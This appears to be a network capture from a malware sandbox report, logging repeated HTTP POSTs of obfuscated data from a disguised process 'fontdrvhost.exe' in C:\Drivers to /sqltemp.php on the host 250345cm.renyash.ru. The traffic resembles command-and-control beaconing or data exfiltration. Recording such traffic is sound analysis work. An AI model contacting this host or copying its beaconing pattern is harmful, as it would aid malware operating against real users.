Jan 1, 2025 14:52:45.213793039 CET	801	IN	HTTP/1.1 200 OK Date: Wed, 01 Jan 2025 13:52:45 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=aB7KzuuiYDBVz8DX1WlLkgs0xExqmNwGzONfgUU0ULQrUeFL5hYn97wXYWubdK9K%2BQWYPV0qiIeFu4yAJaLsPPdy748CxxZodHmaIthlVNtEVIA0In5b1hm9KnjFhfXVj38PnMfm"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8fb2fdd89ec8425d-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=2655&min_rtt=1623&rtt_var=2673&sent=3&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=1307&delivery_rate=147728&cwnd=192&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 34 0d 0a 32 57 5c 58 0d 0a 30 0d 0a 0d 0a Data Ascii: 42W\X0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
53	192.168.2.4	49800	104.21.38.84	80	6324	C:\Drivers\fontdrvhost.exe

Timestamp	Bytes transferred	Direction	Data
Jan 1, 2025 14:52:45.347796917 CET	319	OUT	POST /sqltemp.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29 Host: 250345cm.renyash.ru Content-Length: 1012 Expect: 100-continue Connection: Keep-Alive
Jan 1, 2025 14:52:45.699018002 CET	1012	OUT	Data Raw: 53 57 5f 57 51 5b 54 5c 58 56 52 59 56 5a 59 57 5b 59 54 51 55 5f 50 54 5a 5f 59 50 54 58 55 5f 5c 5d 52 58 58 59 5a 53 5d 5c 51 53 59 52 54 5e 56 54 5f 43 5a 5a 56 5c 54 5c 54 5a 5e 5a 57 5e 5f 5b 5e 5d 53 5d 56 51 5e 5a 59 5e 5a 5c 47 5d 54 5b Data Ascii: SW_WQ[T\XVRYVZYW[YTQU_PTZ_YPTXU_\]RXXYZS]\QSYRT^VT_CZZV\T\TZ^ZW^_[^]S]VQ^ZY^Z\G]T[VVZ]U_VYRSZYVVSZ\V\SGY^UZZYSFX]CQV][YP]]]Z[QYS_P]][_[_XXPRT__TZ^TBPWT_B^B^VYZWDZ[FPZP\U]P^P[T\\SZ]X^]S.'/%#,%%.?A,&7<9+SZ#T?Y;52Y;V9:&Y.,Y--
Jan 1, 2025 14:52:45.833700895 CET	25	IN	HTTP/1.1 100 Continue
Jan 1, 2025 14:52:46.006536007 CET	809	IN	HTTP/1.1 200 OK Date: Wed, 01 Jan 2025 13:52:45 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=BsHqtLHAL%2FreZ3X5PXSgTcE331kFdqXViv1MybE0zlJURMFiguV4KeUEDstbCreYMRwh74XAAEzmNoNI%2F7fVmeLQbDqsOUeGbMtHlo4UXNWqQZk0wzkOtsd2QovVbe%2Be%2FW%2F5zdf7"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8fb2fdde2ac642c0-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=8546&min_rtt=2213&rtt_var=13497&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=1331&delivery_rate=27608&cwnd=211&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 34 0d 0a 32 57 5c 58 0d 0a 30 0d 0a 0d 0a Data Ascii: 42W\X0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
54	192.168.2.4	49801	104.21.38.84	80	6324	C:\Drivers\fontdrvhost.exe

Timestamp	Bytes transferred	Direction	Data
Jan 1, 2025 14:52:46.135413885 CET	319	OUT	POST /sqltemp.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29 Host: 250345cm.renyash.ru Content-Length: 1012 Expect: 100-continue Connection: Keep-Alive
Jan 1, 2025 14:52:46.480454922 CET	1012	OUT	Data Raw: 53 54 5a 53 51 5d 51 55 58 56 52 59 56 5e 59 56 5b 53 54 5a 55 55 50 55 5a 5f 59 50 54 58 55 5f 5c 5d 52 58 58 59 5a 53 5d 5c 51 53 59 52 54 5e 56 54 5f 43 5a 5a 56 5c 54 5c 54 5a 5e 5a 57 5e 5f 5b 5e 5d 53 5d 56 51 5e 5a 59 5e 5a 5c 47 5d 54 5b Data Ascii: STZSQ]QUXVRYV^YV[STZUUPUZ_YPTXU_\]RXXYZS]\QSYRT^VT_CZZV\T\TZ^ZW^_[^]S]VQ^ZY^Z\G]T[VVZ]U_VYRSZYVVSZ\V\SGY^UZZYSFX]CQV][YP]]]Z[QYS_P]][_[_XXPRT__TZ^TBPWT_B^B^VYZWDZ[FPZP\U]P^P[T\\SZ]X^]S.X3,&#"'?8:##**8).;7T ?;.%Y$9&Y.,Y-
Jan 1, 2025 14:52:46.608587027 CET	25	IN	HTTP/1.1 100 Continue
Jan 1, 2025 14:52:46.874351978 CET	809	IN	HTTP/1.1 200 OK Date: Wed, 01 Jan 2025 13:52:46 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=w%2F0L%2F5B0COUDx%2FycNXSbxBT3fBi6MktNg85JP15HBlXIS7bvJdfmn2mQ4m4lNAqqazDmmvYCk2Qxdd%2Be7m3aMNse%2BS4nwYpw2PyIomUN3ijCZOinMfSfCumlCGl59ypefI2pXczo"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8fb2fde2fe178cb7-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=3165&min_rtt=1908&rtt_var=3229&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=1331&delivery_rate=122032&cwnd=167&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 34 0d 0a 32 57 5c 58 0d 0a 30 0d 0a 0d 0a Data Ascii: 42W\X0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
55	192.168.2.4	49802	104.21.38.84	80	6324	C:\Drivers\fontdrvhost.exe

Timestamp	Bytes transferred	Direction	Data
Jan 1, 2025 14:52:46.996001005 CET	319	OUT	POST /sqltemp.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29 Host: 250345cm.renyash.ru Content-Length: 1012 Expect: 100-continue Connection: Keep-Alive
Jan 1, 2025 14:52:47.355566025 CET	1012	OUT	Data Raw: 53 53 5a 54 54 51 51 51 58 56 52 59 56 50 59 53 5b 5a 54 5a 55 5c 50 55 5a 5f 59 50 54 58 55 5f 5c 5d 52 58 58 59 5a 53 5d 5c 51 53 59 52 54 5e 56 54 5f 43 5a 5a 56 5c 54 5c 54 5a 5e 5a 57 5e 5f 5b 5e 5d 53 5d 56 51 5e 5a 59 5e 5a 5c 47 5d 54 5b Data Ascii: SSZTTQQQXVRYVPYS[ZTZU\PUZ_YPTXU_\]RXXYZS]\QSYRT^VT_CZZV\T\TZ^ZW^_[^]S]VQ^ZY^Z\G]T[VVZ]U_VYRSZYVVSZ\V\SGY^UZZYSFX]CQV][YP]]]Z[QYS_P]][_[_XXPRT__TZ^TBPWT_B^B^VYZWDZ[FPZP\U]P^P[T\\SZ]X^]S._0%[7<!03B,:=#(:?U).Y#(6%?-:&Y.,Y-
Jan 1, 2025 14:52:47.449286938 CET	25	IN	HTTP/1.1 100 Continue
Jan 1, 2025 14:52:47.716538906 CET	806	IN	HTTP/1.1 200 OK Date: Wed, 01 Jan 2025 13:52:47 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=F5xg%2FGGcF7AvTfVxOdrQu%2BG4CwR8S0ncInO%2FW7RnaJx27isV6FZ5PJ6DbFPrfyDFAsVUcJjyzmMi0HGrIYAQHUeXZoWpEK2pB3DqWqGUSmcGDtFSaRrKKp%2FaM2KRm3xGgPorYPki"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8fb2fde84fe18c1d-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=5122&min_rtt=2010&rtt_var=6978&sent=4&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=1331&delivery_rate=54260&cwnd=180&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 34 0d 0a 32 57 5c 58 0d 0a 30 0d 0a 0d 0a Data Ascii: 42W\X0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
56	192.168.2.4	49803	104.21.38.84	80	6324	C:\Drivers\fontdrvhost.exe

Timestamp	Bytes transferred	Direction	Data
Jan 1, 2025 14:52:47.843517065 CET	319	OUT	POST /sqltemp.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29 Host: 250345cm.renyash.ru Content-Length: 1012 Expect: 100-continue Connection: Keep-Alive
Jan 1, 2025 14:52:48.198997021 CET	1012	OUT	Data Raw: 53 54 5f 5d 51 5f 54 56 58 56 52 59 56 5e 59 52 5b 5c 54 5a 55 5d 50 5e 5a 5f 59 50 54 58 55 5f 5c 5d 52 58 58 59 5a 53 5d 5c 51 53 59 52 54 5e 56 54 5f 43 5a 5a 56 5c 54 5c 54 5a 5e 5a 57 5e 5f 5b 5e 5d 53 5d 56 51 5e 5a 59 5e 5a 5c 47 5d 54 5b Data Ascii: ST_]Q_TVXVRYV^YR[\TZU]P^Z_YPTXU_\]RXXYZS]\QSYRT^VT_CZZV\T\TZ^ZW^_[^]S]VQ^ZY^Z\G]T[VVZ]U_VYRSZYVVSZ\V\SGY^UZZYSFX]CQV][YP]]]Z[QYS_P]][_[_XXPRT__TZ^TBPWT_B^B^VYZWDZ[FPZP\U]P^P[T\\SZ]X^]S.Z3,:4'=;C,#-/+?-8[#Z;!E&/;-&Y.,Y-

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
57	192.168.2.4	49804	104.21.38.84	80	6324	C:\Drivers\fontdrvhost.exe

Timestamp	Bytes transferred	Direction	Data
Jan 1, 2025 14:52:48.299252987 CET	319	OUT	POST /sqltemp.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29 Host: 250345cm.renyash.ru Content-Length: 1852 Expect: 100-continue Connection: Keep-Alive
Jan 1, 2025 14:52:48.652108908 CET	1852	OUT	Data Raw: 53 55 5a 57 54 5d 51 55 58 56 52 59 56 5e 59 5f 5b 5f 54 5f 55 5c 50 5a 5a 5f 59 50 54 58 55 5f 5c 5d 52 58 58 59 5a 53 5d 5c 51 53 59 52 54 5e 56 54 5f 43 5a 5a 56 5c 54 5c 54 5a 5e 5a 57 5e 5f 5b 5e 5d 53 5d 56 51 5e 5a 59 5e 5a 5c 47 5d 54 5b Data Ascii: SUZWT]QUXVRYV^Y_[_T_U\PZZ_YPTXU_\]RXXYZS]\QSYRT^VT_CZZV\T\TZ^ZW^_[^]S]VQ^ZY^Z\G]T[VVZ]U_VYRSZYVVSZ\V\SGY^UZZYSFX]CQV][YP]]]Z[QYS_P]][_[_XXPRT__TZ^TBPWT_B^B^VYZWDZ[FPZP\U]P^P[T\\SZ]X^]S-$/=Y >$='B,*4=[?)8(. !?[<])D%<?S-&Y.,Y-
Jan 1, 2025 14:52:48.746593952 CET	25	IN	HTTP/1.1 100 Continue
Jan 1, 2025 14:52:49.014851093 CET	950	IN	HTTP/1.1 200 OK Date: Wed, 01 Jan 2025 13:52:48 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=6K7medMD8m6o8CATZCoXl1VnwzKmo9uMZHsdNNb5t9PCPsB80THdq7midFIVoRYLG15kdiOA2LVrUeLLEHcLj4slXuDyqIF9lYdttNCzJrInZf3M2ECOt23MvDjmr5I6lXSN0%2Frl"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8fb2fdf0680e439d-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=8450&min_rtt=1628&rtt_var=14255&sent=3&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=2171&delivery_rate=25975&cwnd=200&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 39 38 0d 0a 00 1f 25 55 3e 3e 35 0f 25 1c 05 00 2a 3d 2f 10 25 10 0b 02 3f 5e 2a 59 26 2e 0d 59 3d 2a 3f 58 36 3f 29 11 32 38 38 1d 20 2d 2c 03 33 1e 2b 59 05 1c 20 40 36 2f 0e 5e 3d 2e 33 16 27 2f 03 13 26 3e 28 5d 3c 38 24 57 23 2b 27 5a 27 3e 2b 03 29 3a 34 1f 27 05 3c 03 2d 01 2d 52 30 10 2c 54 00 11 25 0c 33 1f 3f 05 37 37 2c 12 22 22 25 12 31 34 25 09 26 2f 2f 55 37 39 08 1b 31 0b 33 5e 35 0d 3d 07 32 3b 26 05 20 03 30 0d 29 04 25 53 20 02 2d 48 05 3f 57 53 0d 0a 30 0d 0a 0d 0a Data Ascii: 98%U>>5%=/%?^Y&.Y=*?X6?)288 -,3+Y @6/^=.3'/&>(]<8$W#+'Z'>+):4'<--R0,T%3?77,""%14%&//U7913^5=2;& 0)%S -H?WS0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
58	192.168.2.4	49805	104.21.38.84	80	6324	C:\Drivers\fontdrvhost.exe

Timestamp	Bytes transferred	Direction	Data
Jan 1, 2025 14:52:48.416573048 CET	319	OUT	POST /sqltemp.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29 Host: 250345cm.renyash.ru Content-Length: 1012 Expect: 100-continue Connection: Keep-Alive
Jan 1, 2025 14:52:48.761404037 CET	1012	OUT	Data Raw: 56 51 5a 51 54 51 51 57 58 56 52 59 56 58 59 57 5b 5b 54 5d 55 5a 50 59 5a 5f 59 50 54 58 55 5f 5c 5d 52 58 58 59 5a 53 5d 5c 51 53 59 52 54 5e 56 54 5f 43 5a 5a 56 5c 54 5c 54 5a 5e 5a 57 5e 5f 5b 5e 5d 53 5d 56 51 5e 5a 59 5e 5a 5c 47 5d 54 5b Data Ascii: VQZQTQQWXVRYVXYW[[T]UZPYZ_YPTXU_\]RXXYZS]\QSYRT^VT_CZZV\T\TZ^ZW^_[^]S]VQ^ZY^Z\G]T[VVZ]U_VYRSZYVVSZ\V\SGY^UZZYSFX]CQV][YP]]]Z[QYS_P]][_[_XXPRT__TZ^TBPWT_B^B^VYZWDZ[FPZP\U]P^P[T\\SZ]X^]S.X$>#/=_0=48 [3()+W)8]#+[<52?T:&Y.,Y-%
Jan 1, 2025 14:52:48.859692097 CET	25	IN	HTTP/1.1 100 Continue
Jan 1, 2025 14:52:49.029669046 CET	817	IN	HTTP/1.1 200 OK Date: Wed, 01 Jan 2025 13:52:48 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=NFUW%2F3%2FhOtgt948rgtL%2Bb5xFj8DblZebbpT8SOEueuuuQxReAkdGLvfyjU5ul9otNm%2BWqotxc48PMQP85o9pY4%2F5v2pGNnSH%2Fi%2BvHTRXhk%2FLA1mXGqHOizO6iktRiKKL%2FkylqQI9"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8fb2fdf11f344304-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=7965&min_rtt=1701&rtt_var=13167&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=1331&delivery_rate=28176&cwnd=247&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 34 0d 0a 32 57 5c 58 0d 0a 30 0d 0a 0d 0a Data Ascii: 42W\X0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
59	192.168.2.4	49806	104.21.38.84	80	6324	C:\Drivers\fontdrvhost.exe

Timestamp	Bytes transferred	Direction	Data
Jan 1, 2025 14:52:49.151197910 CET	295	OUT	POST /sqltemp.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29 Host: 250345cm.renyash.ru Content-Length: 1012 Expect: 100-continue
Jan 1, 2025 14:52:49.495932102 CET	1012	OUT	Data Raw: 56 55 5f 52 51 58 54 5d 58 56 52 59 56 5c 59 51 5b 53 54 5c 55 58 50 55 5a 5f 59 50 54 58 55 5f 5c 5d 52 58 58 59 5a 53 5d 5c 51 53 59 52 54 5e 56 54 5f 43 5a 5a 56 5c 54 5c 54 5a 5e 5a 57 5e 5f 5b 5e 5d 53 5d 56 51 5e 5a 59 5e 5a 5c 47 5d 54 5b Data Ascii: VU_RQXT]XVRYV\YQ[ST\UXPUZ_YPTXU_\]RXXYZS]\QSYRT^VT_CZZV\T\TZ^ZW^_[^]S]VQ^ZY^Z\G]T[VVZ]U_VYRSZYVVSZ\V\SGY^UZZYSFX]CQV][YP]]]Z[QYS_P]][_[_XXPRT__TZ^TBPWT_B^B^VYZWDZ[FPZP\U]P^P[T\\SZ]X^]S.^&/"7?)%=4.:)W7 [(_+V)(724<61?'W,:&Y.,Y-5
Jan 1, 2025 14:52:49.597302914 CET	25	IN	HTTP/1.1 100 Continue
Jan 1, 2025 14:52:49.866640091 CET	808	IN	HTTP/1.1 200 OK Date: Wed, 01 Jan 2025 13:52:49 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=vko7v867KZu9l3FFi%2FmYOY95W7Dy69s49sboBg93%2FwxNAWBemyZr4ao%2BavIJwjsrknmU3m%2BUgppzFKw5j9Bbi7DAv8WDRLacLWkWcQhOm0tfzCGUDK0SybtgMyRXeBG%2BKOL21ca4"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8fb2fdf5bfb643ee-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=3776&min_rtt=1811&rtt_var=4609&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=1307&delivery_rate=83281&cwnd=229&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 34 0d 0a 32 57 5c 58 0d 0a 30 0d 0a 0d 0a Data Ascii: 42W\X0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
60	192.168.2.4	49808	104.21.38.84	80	6324	C:\Drivers\fontdrvhost.exe

Timestamp	Bytes transferred	Direction	Data
Jan 1, 2025 14:52:49.994513035 CET	319	OUT	POST /sqltemp.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29 Host: 250345cm.renyash.ru Content-Length: 1008 Expect: 100-continue Connection: Keep-Alive
Jan 1, 2025 14:52:50.339601040 CET	1008	OUT	Data Raw: 53 55 5a 54 54 5d 54 55 58 56 52 59 56 59 59 5f 5b 58 54 58 55 5a 50 5d 5a 5f 59 50 54 58 55 5f 5c 5d 52 58 58 59 5a 53 5d 5c 51 53 59 52 54 5e 56 54 5f 43 5a 5a 56 5c 54 5c 54 5a 5e 5a 57 5e 5f 5b 5e 5d 53 5d 56 51 5e 5a 59 5e 5a 5c 47 5d 54 5b Data Ascii: SUZTT]TUXVRYVYY_[XTXUZP]Z_YPTXU_\]RXXYZS]\QSYRT^VT_CZZV\T\TZ^ZW^_[^]S]VQ^ZY^Z\G]T[VVZ]U_VYRSZYVVSZ\V\SGY^UZZYSFX]CQV][YP]]]Z[QYS_P]][_[_XXPRT__TZ^TBPWT_B^B^VYZWDZ[FPZP\U]P^P[T\\SZ]X^]S.['#Y%\%>@/2#,Z+_ =+41?\+)17W9&Y.,Y-
Jan 1, 2025 14:52:50.472712040 CET	25	IN	HTTP/1.1 100 Continue
Jan 1, 2025 14:52:51.034471035 CET	806	IN	HTTP/1.1 200 OK Date: Wed, 01 Jan 2025 13:52:50 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=FGomF%2FHa7EexpPfC6So495oiedSuwCE%2BrJEvX0A1Eojy57Lu7EQcXWp1EBwmDewSU8y6pgbhWKAuzzpXWpRQ%2BYtfLSo%2BiXDhByKON5baHMMrQeKEFF97ETARyNPaB8x7E4TAmpTa"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8fb2fdfb29bc5e79-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=4272&min_rtt=1662&rtt_var=5844&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=1327&delivery_rate=64759&cwnd=224&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 34 0d 0a 32 57 5c 58 0d 0a 30 0d 0a 0d 0a Data Ascii: 42W\X0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
61	192.168.2.4	49809	104.21.38.84	80	6324	C:\Drivers\fontdrvhost.exe

Timestamp	Bytes transferred	Direction	Data
Jan 1, 2025 14:52:51.150233984 CET	319	OUT	POST /sqltemp.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29 Host: 250345cm.renyash.ru Content-Length: 1012 Expect: 100-continue Connection: Keep-Alive
Jan 1, 2025 14:52:51.495820999 CET	1012	OUT	Data Raw: 56 5e 5f 55 51 5c 51 57 58 56 52 59 56 5a 59 54 5b 59 54 59 55 55 50 54 5a 5f 59 50 54 58 55 5f 5c 5d 52 58 58 59 5a 53 5d 5c 51 53 59 52 54 5e 56 54 5f 43 5a 5a 56 5c 54 5c 54 5a 5e 5a 57 5e 5f 5b 5e 5d 53 5d 56 51 5e 5a 59 5e 5a 5c 47 5d 54 5b Data Ascii: V^_UQ\QWXVRYVZYT[YTYUUPTZ_YPTXU_\]RXXYZS]\QSYRT^VT_CZZV\T\TZ^ZW^_[^]S]VQ^ZY^Z\G]T[VVZ]U_VYRSZYVVSZ\V\SGY^UZZYSFX]CQV][YP]]]Z[QYS_P]][_[_XXPRT__TZ^TBPWT_B^B^VYZWDZ[FPZP\U]P^P[T\\SZ]X^]S.X&?!]7!'.<.9" [3(*#W=$ ((]9A&,79&Y.,Y--
Jan 1, 2025 14:52:51.592094898 CET	25	IN	HTTP/1.1 100 Continue
Jan 1, 2025 14:52:51.864300013 CET	809	IN	HTTP/1.1 200 OK Date: Wed, 01 Jan 2025 13:52:51 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=7lnx9Bpk2rGBPrbzYYF68i7D5R1QYL5PXB%2BtbIUS64jPKjWAlgfSlGlU%2B7GQNjykzEaxxqiAm5Y5MaqNrGMLid8OKGU0T%2Fnd2OcX%2BEmyxC4E3qRNJBwbxsix4Kt%2BAGZRYbJLPkX8"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8fb2fe022b85423a-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=8356&min_rtt=1914&rtt_var=13603&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=1331&delivery_rate=27311&cwnd=169&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 34 0d 0a 32 57 5c 58 0d 0a 30 0d 0a 0d 0a Data Ascii: 42W\X0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
62	192.168.2.4	49810	104.21.38.84	80	6324	C:\Drivers\fontdrvhost.exe

Timestamp	Bytes transferred	Direction	Data
Jan 1, 2025 14:52:51.994693041 CET	319	OUT	POST /sqltemp.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29 Host: 250345cm.renyash.ru Content-Length: 1012 Expect: 100-continue Connection: Keep-Alive
Jan 1, 2025 14:52:52.339708090 CET	1012	OUT	Data Raw: 56 50 5a 50 54 59 51 57 58 56 52 59 56 51 59 56 5b 53 54 5e 55 55 50 5e 5a 5f 59 50 54 58 55 5f 5c 5d 52 58 58 59 5a 53 5d 5c 51 53 59 52 54 5e 56 54 5f 43 5a 5a 56 5c 54 5c 54 5a 5e 5a 57 5e 5f 5b 5e 5d 53 5d 56 51 5e 5a 59 5e 5a 5c 47 5d 54 5b Data Ascii: VPZPTYQWXVRYVQYV[ST^UUP^Z_YPTXU_\]RXXYZS]\QSYRT^VT_CZZV\T\TZ^ZW^_[^]S]VQ^ZY^Z\G]T[VVZ]U_VYRSZYVVSZ\V\SGY^UZZYSFX]CQV][YP]]]Z[QYS_P]][_[_XXPRT__TZ^TBPWT_B^B^VYZWDZ[FPZP\U]P^P[T\\SZ]X^]S-&/%#/0>D8!> Y+#W>$[##\?8)%,(-&Y.,Y-
Jan 1, 2025 14:52:52.440845013 CET	25	IN	HTTP/1.1 100 Continue
Jan 1, 2025 14:52:52.702603102 CET	806	IN	HTTP/1.1 200 OK Date: Wed, 01 Jan 2025 13:52:52 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=DG%2FUbBuOxBnYycv3nLL0dvbVwAChw%2FwsdxHqqOlg9Q5kyxcnxNH5rjMTXjAOBte%2FeCGJzY7SzVspOa%2BAFZtSRsTfUPn7nPGD2e9qlOl8aKg1T1xY101iOzWOLJxpV9Er9M4T3OiB"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8fb2fe077ba36a50-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=4048&min_rtt=1756&rtt_var=5242&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=1331&delivery_rate=72662&cwnd=233&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 34 0d 0a 32 57 5c 58 0d 0a 30 0d 0a 0d 0a Data Ascii: 42W\X0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
63	192.168.2.4	49811	104.21.38.84	80	6324	C:\Drivers\fontdrvhost.exe

Timestamp	Bytes transferred	Direction	Data
Jan 1, 2025 14:52:52.822398901 CET	319	OUT	POST /sqltemp.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29 Host: 250345cm.renyash.ru Content-Length: 1012 Expect: 100-continue Connection: Keep-Alive
